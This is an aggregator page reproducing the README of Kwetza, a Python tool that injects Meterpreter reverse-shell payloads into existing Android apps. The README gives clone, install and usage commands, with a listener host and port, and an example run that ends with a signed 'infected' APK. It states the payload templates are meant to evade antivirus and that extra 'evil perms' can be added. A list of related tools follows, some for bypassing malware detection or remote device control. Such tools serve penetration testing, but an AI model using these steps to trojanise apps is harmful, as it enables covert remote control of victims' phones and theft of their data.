All Projects → sensepost → Kwetza

sensepost / Kwetza

Licence: gpl-2.0
Python script to inject existing Android applications with a Meterpreter payload.

Labels

Projects that are alternatives of or similar to Kwetza

Com.tencent.mm
WeChat
Stars: ✭ 208 (-61.05%)
Mutual labels:  smali
ffapi-project
A project containing all Fast Food related APIs and other things.
Stars: ✭ 21 (-96.07%)
Mutual labels:  smali
Reverseapk
Quickly analyze and reverse engineer Android packages
Stars: ✭ 419 (-21.54%)
Mutual labels:  smali
Android Crack Tool
🐞Android crack tool For Mac
Stars: ✭ 2,666 (+399.25%)
Mutual labels:  smali
dalvikgate
Lightweight dex / odex / apk to jar converter
Stars: ✭ 32 (-94.01%)
Mutual labels:  smali
Smalisca
Static Code Analysis for Smali files
Stars: ✭ 284 (-46.82%)
Mutual labels:  smali
Apkstudio
Open-source, cross platform Qt based IDE for reverse-engineering Android application packages.
Stars: ✭ 2,246 (+320.6%)
Mutual labels:  smali
Dexcalibur
[Official] Android reverse engineering tool focused on dynamic instrumentation automation. Powered by Frida. It disassembles dex, analyzes it statically, generates hooks, discovers reflected methods, stores intercepted data and does new things from it. Its aim is to be an all-in-one Android reverse engineering platform.
Stars: ✭ 512 (-4.12%)
Mutual labels:  smali
reverse android
安卓从开发到逆向
Stars: ✭ 65 (-87.83%)
Mutual labels:  smali
Adhrit
Android Security Suite for in-depth reconnaissance and static bytecode analysis based on Ghera benchmarks.
Stars: ✭ 399 (-25.28%)
Mutual labels:  smali
Smali2java
Recreate Java code from Smali
Stars: ✭ 232 (-56.55%)
Mutual labels:  smali
dex2jar
Tools to work with android .dex and java .class files
Stars: ✭ 102 (-80.9%)
Mutual labels:  smali
Xploitspy
XploitSPY is an Android Monitoring Tool
Stars: ✭ 372 (-30.34%)
Mutual labels:  smali
Avpass
Tool for leaking and bypassing Android malware detection system
Stars: ✭ 218 (-59.18%)
Mutual labels:  smali
Obfuscapk
An automatic obfuscation tool for Android apps that works in a black-box fashion, supports advanced obfuscation features and has a modular architecture easily extensible with new techniques
Stars: ✭ 456 (-14.61%)
Mutual labels:  smali
Sigkill
一键绕过App签名验证
Stars: ✭ 172 (-67.79%)
Mutual labels:  smali
Deejayeye Modder
Stars: ✭ 284 (-46.82%)
Mutual labels:  smali
L3mon
L3MON - Remote Android Managment Suite
Stars: ✭ 527 (-1.31%)
Mutual labels:  smali
Apklab
Android Reverse-Engineering Workbench for VS Code
Stars: ✭ 470 (-11.99%)
Mutual labels:  smali
Intellij Java2smali
A plugin for IntelliJ IDEA & Android Studio to easily compile Java & Kotlin files to smali.
Stars: ✭ 384 (-28.09%)
Mutual labels:  smali

Introduction

Arsenal

By Chris Le Roy ([email protected]

Kwetza is a tool that allows you to infect an existing Android application with a Meterpreter payload.

What does it do?

Kwetza infects an existing Android application with either custom or default payload templates to avoid detection by antivirus. Kwetza allows you to infect Android applications using the target application's default permissions or inject additional permissions to gain additional functionality.

Where can I get the blogpost?

The manual steps automated by Kwetza can be found here: https://sensepost.com/blog/2016/kwetza-infecting-android-applications/

Getting the code

Firstly get the code:

git clone https://github.com/sensepost/kwetza.git

Kwetza is written in Python and requires BeautifulSoup which can be installed using Pip:

pip install beautifulsoup4

Kwetza requires Apktool to be install and accessible via your PATH. This can be setup using the install instructions located here: https://ibotpeaches.github.io/Apktool/install

Usage

python kwetza.py nameOfTheApkToInfect.apk https/tcp LHOST LPORT yes/no customClass

  • nameOfTheApkToInfect.apk = name of the APK you wish to infect.
  • https/tcp = select either a HTTPS or TCP connection
  • LHOST = IP of your listener.
  • LPORT = Port of your listener.
  • yes = include "yes" to inject additional evil perms into the app, "no" to utilize the default permissions of the app.
  • customClass = Specify a custom activity here if you want Kwetza to inject into this activity.
python kwetza.py hackme.apk https 10.42.0.118 4444 yes com.moo.another.activity
[+] MMMMMM KWETZA
[*] DECOMPILING TARGET APK
[+] ENDPOINT IP: 10.42.0.118
[+] ENDPOINT PORT: 4444
[+] APKTOOL DECOMPILED SUCCESS
[*] BYTING COMMS...
[*] ANALYZING ANDROID MANIFEST...
[+] TARGET ACTIVITY: com.foo.moo.gui.MainActivity
[*] INJECTION INTO APK
[+] CHECKING IF ADDITIONAL PERMS TO BE ADDED
[*] INJECTION OF CRAZY PERMS TO BE DONE!
[+] TIME TO BUILD INFECTED APK
[*] EXECUTING APKTOOL BUILD COMMAND
[+] BUILD RESULT
############################################
I: Using APktool 2.2.0
I: Checking whether source shas changed...
I: Smaling smali folder into classes.dex
I: Checking whether resources has changed...
I: Building resources...
I: Copying libs ...(/lib)
I: Building apk file...
I: Copying unknown files/dir...
###########################################
[*] EXECUTING JARSIGNER COMMAND...
Enter Passphrase for keystore: password
[+] JARSIGNER RESULT
###########################################
jar signed.

###########################################

[+] L00t located at hackme/dist/hackme.apk

Information

Kwetza has been developed to work with Python 2.

Kwetza by default will use the template and keystore located in the folder "payload" to inject and sign the infected apk.

If you would like to sign the infected application with your own certificate, generate a new keystore and place it in the "payload" folder and rename to the existing keystore or change the reference in the kwetza.py.

The same can be done for payload templates.

The password for the default keystore is, well, "password".

License

Kwetza is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License (http://creativecommons.org/licenses/by-nc-sa/4.0).

Permissions beyond the scope of this license may be available at http://sensepost.com/contact

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].